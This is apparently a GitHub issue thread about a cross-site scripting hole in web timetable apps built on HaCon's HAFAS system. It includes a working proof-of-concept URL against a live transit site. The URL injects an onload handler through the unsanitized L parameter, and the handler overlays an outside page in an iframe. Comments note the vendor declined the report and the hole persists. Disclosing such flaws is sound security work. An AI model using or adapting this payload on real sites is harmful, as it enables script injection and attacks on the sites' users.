Open simonkoeck opened 1 year ago
derhuerst
commented
1 year ago Indeed, this is an XSS vulnerability in their HAFAS-based sites, not in hafas-client.
I've tried to get in touch with HaCon about this by just calling their contact phone number. They told me it's none of their business since I'm not a business partner of them. 🤡
Will get in touch with @zerforschung later or tomorrow. Maybe they're interested in dealing with this.
derhuerst
commented
4 months ago Just for the record: This issue still exists in >=1 HAFAS deployments. 🤡
simonkoeck
commented
4 months ago Just for the record: This issue still exists in >=1 HAFAS deployments. 🤡
yes🤪
derhuerst
commented
1 day ago Just for the record: This issue still exists in >=1 HAFAS deployments. 🤡🤡
There is a Cross Site Scripting Security Vulnerability in the HAFAS Client.
For example this link: https://fahrplan.vmobil.at/webapp/index.html?L=vs_vvv%2Fjs%2Fhafas_webapp_config.js%3Fv%3D1613454502135%22%20onload%3D%22var%20e%3D%20document.createElement%28%27iframe%27%29%3Be.src%3D%27https%3A%2F%2Ftrollface.dk%27%3Be.style.cssText%20%3D%20%27position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A100%3Bbackground%3A%23000%27%3Bdocument.body.appendChild%28e%29%3B%22
which results in the following html:
https://cdn.koeck.dev/276d8e.png
The vulnerable parameter is the L parameter which sets the customer. The parameter won't be sanitized.
I've found the vulnerability in several Web Apps which use the HAFAS client, but I'm not sure if the vulnerability is a bug in the hafas client or in the implementation of hafas. Just wanted to report the vulnerability here because my phone call was left unanswered :D